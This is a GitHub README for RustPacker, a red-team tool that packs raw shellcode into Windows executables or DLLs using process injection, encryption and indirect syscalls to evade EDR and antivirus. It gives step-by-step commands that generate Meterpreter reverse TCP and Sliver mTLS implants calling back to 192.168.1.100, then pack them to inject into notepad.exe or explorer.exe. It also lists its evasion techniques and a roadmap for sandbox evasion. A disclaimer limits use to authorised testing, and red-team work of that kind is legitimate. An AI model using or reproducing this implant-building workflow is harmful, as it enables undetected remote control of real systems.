Skip to content

Template-based shellcode packer written in Rust, with indirect syscall support. Made with <3 for pentesters.

License

Notifications You must be signed in to change notification settings

Nariod/RustPacker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation



🎯 Overview

RustPacker is a template-based shellcode packer designed for penetration testers and red team operators. It converts raw shellcode into Windows executables or DLLs using various injection techniques and evasion methods.

✨ Key Features

  • Multiple Injection Templates: Choose from various injection techniques (CRT, APC, Fibers, etc.)
  • Encryption Support: XOR and AES encryption for payload obfuscation
  • Syscall Evasion: Indirect syscalls to bypass EDR/AV detection
  • Flexible Output: Generate both EXE and DLL files
  • Cross-Platform: Works on any OS with Docker/Podman support
  • Framework Compatible: Works with Metasploit, Sliver, and custom shellcode

πŸš€ Quick Start

Using Docker/Podman (Recommended)

# Clone the repository
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/

# Build the container (recommended: use Podman for security)
podman build -t rustpacker -f Dockerfile

# Place your shellcode file in the shared folder
cp your_shellcode.raw shared/

# Pack your shellcode
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker \
  -f shared/your_shellcode.raw \
  -i ntcrt \
  -e aes \
  -b exe \
  -t notepad.exe

# Find your packed binary in shared/output_[RANDOM_NAME]/target/x86_64-pc-windows-gnu/release/

Create an Alias for Convenience

# Linux/macOS
alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker'

# Now you can use it simply:
rustpacker -f shared/payload.raw -i syscrt -e aes -b exe -t explorer.exe

πŸ“‹ Usage Examples

Generate Shellcode

Metasploit (msfvenom):

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f raw -o payload.raw

Sliver:

# In Sliver console
generate --mtls 192.168.1.100:443 --format shellcode --os windows --evasion

Packing Examples

Basic EXE with AES encryption:

rustpacker -f shared/payload.raw -i ntcrt -e aes -b exe -t notepad.exe

DLL with XOR encryption:

rustpacker -f shared/payload.raw -i ntapc -e xor -b dll

Custom output location:

rustpacker -f shared/payload.raw -i syscrt -e aes -b exe -o shared/custom_name.exe

πŸ› οΈ Available Templates

Template Description Injection Method Syscalls
wincrt High-level Windows API injection Remote Process ❌
ntcrt Low-level NT API injection Remote Process ❌
syscrt Indirect syscalls injection Remote Process βœ…
ntapc APC-based execution New Process ❌
winfiber Fiber-based execution Current Process ❌
ntfiber NT API + Fiber execution Current Process ❌
sysfiber Indirect syscalls + Fiber execution Current Process βœ…

Template Details

Process Injection Templates:

  • Use with -t <process_name> to specify target process
  • Default target: dllhost.exe
  • Compatible with: wincrt, ntcrt, syscrt

Self-Execution Templates:

  • Execute shellcode within the packed binary
  • Compatible with: ntapc, winfiber, ntfiber, sysfiber

βš™οΈ Local Installation

Prerequisites

# Ubuntu/Debian
sudo apt update && sudo apt upgrade -y
sudo apt install -y libssl-dev librust-openssl-dev musl-tools mingw-w64 cmake libxml2-dev

# Install Rust
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
rustup target add x86_64-pc-windows-gnu

Build and Run

git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
cargo run -- -f shared/payload.raw -i ntcrt -e xor -b exe -t explorer.exe

πŸ“– Command Line Options

RustPacker [OPTIONS]

OPTIONS:
    -f, --file <FILE>           Input shellcode file (raw format)
    -i, --injection <TEMPLATE>  Injection template [wincrt|ntcrt|syscrt|ntapc|winfiber|ntfiber|sysfiber]
    -e, --encryption <TYPE>     Encryption method [xor|aes]
    -b, --binary <TYPE>         Output binary type [exe|dll]
    -t, --target <PROCESS>      Target process name (for injection templates)
    -o, --output <PATH>         Custom output path and filename
    -h, --help                  Print help information
    -V, --version               Print version information

πŸ”’ Detection Evasion

RustPacker implements several evasion techniques:

  • Indirect Syscalls: Bypass user-mode hooks (syscrt, sysfiber templates)
  • Encryption: XOR and AES payload encryption
  • Process Injection: Hide execution in legitimate processes
  • Template Variety: Multiple execution methods to avoid signatures
  • Rust Compilation: Native binaries with reduced detection surface

🐳 Why Podman over Docker?

We recommend using Podman instead of Docker for security reasons:

  • Rootless containers by default
  • No daemon running as root
  • Better security isolation

🀝 Contributing

Contributions are welcome! Here's how you can help:

  1. Code Review: Review the codebase for improvements
  2. Issues: Report bugs or request features
  3. Templates: Contribute new injection techniques
  4. Documentation: Improve documentation and examples

Development Roadmap

  • Multiple injection templates
  • XOR and AES encryption
  • Indirect syscalls support
  • EXE and DLL output formats
  • Docker containerization
  • String encryption (litcrypt)
  • Sandbox evasion techniques
  • Binary signing support
  • Mutex/Semaphore support

πŸ™ Acknowledgments

πŸ“„ License & Legal Notice

⚠️ IMPORTANT DISCLAIMER ⚠️

This tool is provided for educational and authorized penetration testing purposes only.

  • Usage against targets without prior mutual consent is illegal
  • Users are responsible for complying with all applicable laws
  • Developers assume no liability for misuse or damages
  • Only use in authorized environments with proper permission

Use responsibly and ethically.


Made with ❀️ for the cybersecurity community

Report Issues β€’ Contribute β€’ Documentation

About

Template-based shellcode packer written in Rust, with indirect syscall support. Made with <3 for pentesters.

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Contributors 2

  •  
  •